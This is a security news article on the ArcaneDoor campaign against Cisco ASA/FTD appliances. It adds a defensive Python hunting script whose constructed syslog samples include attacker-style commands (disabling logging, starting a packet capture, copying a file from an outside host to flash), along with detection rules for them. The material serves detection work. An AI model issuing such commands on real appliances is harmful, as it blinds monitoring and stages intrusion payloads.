A recent malware campaign used two zero-day vulnerabilities in Cisco networking equipment to distribute bespoke malware and enable surreptitious data collection on target environments.

Cisco Talos calls the campaign ArcaneDoor and attributes it to UAT4356 (tracked by Microsoft as Storm-1849), a previously undocumented, sophisticated state-sponsored actor.

“UAT4356 deployed two backdoors as components of this campaign, ‘Line Runner’ and ‘Line Dancer,’ which were used collectively to conduct malicious actions on-target, which included configuration modification, reconnaissance, network traffic capture/exfiltration and potentially lateral movement,” Talos stated.

The intrusions were first detected and confirmed in early January 2024. They involved the exploitation of two vulnerabilities:

  • CVE-2024-20353 (CVSS score 8.6) – Denial-of-service vulnerability in the web services of Cisco Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) Software
  • CVE-2024-20359 (CVSS score 6.0) – Persistent local code execution vulnerability in Cisco ASA and FTD Software

A zero-day is a vulnerability that is exploited before the vendor knows about it or has released a fix, so at the time of the attack no patch exists and defenders have had no opportunity to address the flaw.

The second vulnerability requires administrator-level privileges to exploit, but it allows a local attacker to execute arbitrary code with root-level privileges. Alongside CVE-2024-20353 and CVE-2024-20359, Cisco also fixed a command injection vulnerability in the same appliances (CVE-2024-20358, CVSS score 6.0) that was found during internal security testing.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added the vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog, and federal agencies are required to apply the vendor-provided fixes by May 1, 2024.

The initial access vector used to compromise the devices is still unknown, although UAT4356 is believed to have been preparing the campaign as early as July 2023.

After establishing a foothold, the actor deploys two implants, Line Dancer and Line Runner. Line Dancer is an in-memory backdoor that lets the attackers upload and execute arbitrary shellcode payloads; it has been used, among other things, to run packet captures and to disable system logging.

Line Runner, by contrast, is a persistent HTTP-based Lua implant installed on the Cisco ASA by abusing the zero-days described above; it is designed to survive reboots and software upgrades. It has been observed retrieving data that Line Dancer had staged.

According to a joint advisory released by cybersecurity agencies from Australia, Canada, and the United Kingdom, “it is suspected that Line Runner may be present on a compromised device even if Line Dancer is not (e.g., as a persistent backdoor, or where an impacted ASA has not yet received full operational attention from the malicious actors).”
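The behaviours described above (disabling syslog, starting packet captures, and writing a persistent payload to the appliance's flash) leave traces that can be checked off-box. The following script is an added example, not code from Cisco Talos, the joint advisory, or this article: it runs a few hunting rules over ASA command-audit syslog lines and compares a `show disk0:` listing against a baseline of expected files. The syslog and listing samples are constructed and only approximate the real formats, and the rules, file names, users and addresses are illustrative assumptions, not Cisco's published detection guidance.

```python
import re
from typing import Dict, List, Optional, Set

# Constructed sample lines approximating ASA message 111010
# ("User ..., running ..., executed ..."); users and IPs are made up.
SAMPLE_SYSLOG = [
    "%ASA-5-111010: User 'admin', running 'CLI' from IP 203.0.113.10, executed 'show version'",
    "%ASA-5-111010: User 'admin', running 'CLI' from IP 203.0.113.10, executed 'no logging enable'",
    "%ASA-5-111010: User 'admin', running 'CLI' from IP 203.0.113.10, executed 'capture cap1 interface inside'",
    "%ASA-5-111010: User 'admin', running 'CLI' from IP 203.0.113.10, executed "
    "'copy /noconfirm http://203.0.113.20/x.zip disk0:/client_bundle_install.zip'",
    "%ASA-5-111010: User 'netops', running 'CLI' from IP 198.51.100.5, executed 'show running-config'",
]

# Extracts user, shell, source IP and the executed command from an audit line.
EXEC_RE = re.compile(
    r"User '(?P<user>[^']+)', running '(?P<shell>[^']+)' from IP (?P<ip>\S+), "
    r"executed '(?P<cmd>[^']*)'"
)

# Hunting rules (label, pattern applied to the command text). Illustrative only.
COMMAND_RULES = [
    ("syslog disabled", re.compile(r"^no\s+logging\b", re.I)),
    ("packet capture started", re.compile(r"^capture\s+\S+", re.I)),
    ("file written to flash", re.compile(r"^copy\b.*\bdisk0:", re.I)),
]


def parse_exec_event(line: str) -> Optional[Dict[str, str]]:
    """Return the fields of a command-audit line, or None if it is not one."""
    m = EXEC_RE.search(line)
    return m.groupdict() if m else None


def review_commands(lines: List[str]) -> List[Dict[str, str]]:
    """Apply every rule to every audit line; one finding per (line, rule) hit."""
    findings = []
    for line in lines:
        event = parse_exec_event(line)
        if event is None:
            continue
        for label, pattern in COMMAND_RULES:
            if pattern.search(event["cmd"]):
                findings.append({"finding": label, **event})
    return findings


# Constructed `show disk0:` output; the layout approximates the real command.
SAMPLE_DISK0 = """\
--#--  --length--  -----date/time------  path
   11       4096  Mar 01 2024 08:00:00  coredumpinfo
   12   12345678  Mar 01 2024 08:00:00  asa9-16-4-smp-k8.bin
   13       2048  Apr 20 2024 03:12:44  client_bundle_install.zip
"""

# Index, length, "Mon DD YYYY HH:MM:SS", then the path; header lines do not match.
DISK0_RE = re.compile(r"^\s*\d+\s+\d+\s+\w{3} \d{2} \d{4} \d{2}:\d{2}:\d{2}\s+(\S+)$")


def list_disk0_files(listing: str) -> List[str]:
    """Return the file names found in a `show disk0:` listing."""
    return [m.group(1) for m in (DISK0_RE.match(l) for l in listing.splitlines()) if m]


def unexpected_disk0_files(listing: str, baseline: Set[str]) -> List[str]:
    """Files present on flash that are not in the known-good baseline."""
    return sorted(set(list_disk0_files(listing)) - baseline)


if __name__ == "__main__":
    for f in review_commands(SAMPLE_SYSLOG):
        print(f"{f['finding']:24} user={f['user']} ip={f['ip']} cmd={f['cmd']}")
    baseline = {"coredumpinfo", "asa9-16-4-smp-k8.bin"}
    print("unexpected on disk0:", unexpected_disk0_files(SAMPLE_DISK0, baseline))
```

Two points about the design: the audit lines must be collected on a separate syslog server, because an actor who disables logging on the appliance stops every later message, so the `no logging` event itself (or an unexplained silence from a device that was previously chatty) is the signal; and the flash baseline should be captured from a known-clean build, since a persistent implant that survives reboots and upgrades will, by definition, still be there after the device is patched.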

Talos attributes the campaign's sophistication and evasiveness to UAT4356's care in covering its tracks at every stage and to advanced anti-forensic techniques intended to defeat memory analysis and reduce the likelihood of detection.

This suggests the threat actor has a thorough understanding of the ASA's internals and of the “forensic actions commonly performed by Cisco for network device integrity validation.”

Although it is not known which nation is behind ArcaneDoor, state-sponsored actors from China and Russia have previously targeted Cisco routers for cyberespionage. Cisco Talos also did not say how many customers were affected by these intrusions.

The recent wave of attacks against Barracuda Networks, Fortinet, Ivanti, Palo Alto Networks, and VMware follows the same pattern: edge devices such as email gateways, firewalls, and VPN concentrators usually cannot run endpoint detection and response (EDR) agents, which makes them attractive and poorly monitored targets.

“Perimeter network devices are the perfect intrusion point for espionage-focused campaigns,” Talos stated.

Because these devices are a critical path for data entering and leaving the network, Talos says they must be patched regularly and promptly, kept on current hardware and software versions and configurations, and closely monitored from a security standpoint. A foothold on such a device lets an actor pivot directly into an organization, reroute or modify traffic, and monitor network communications.
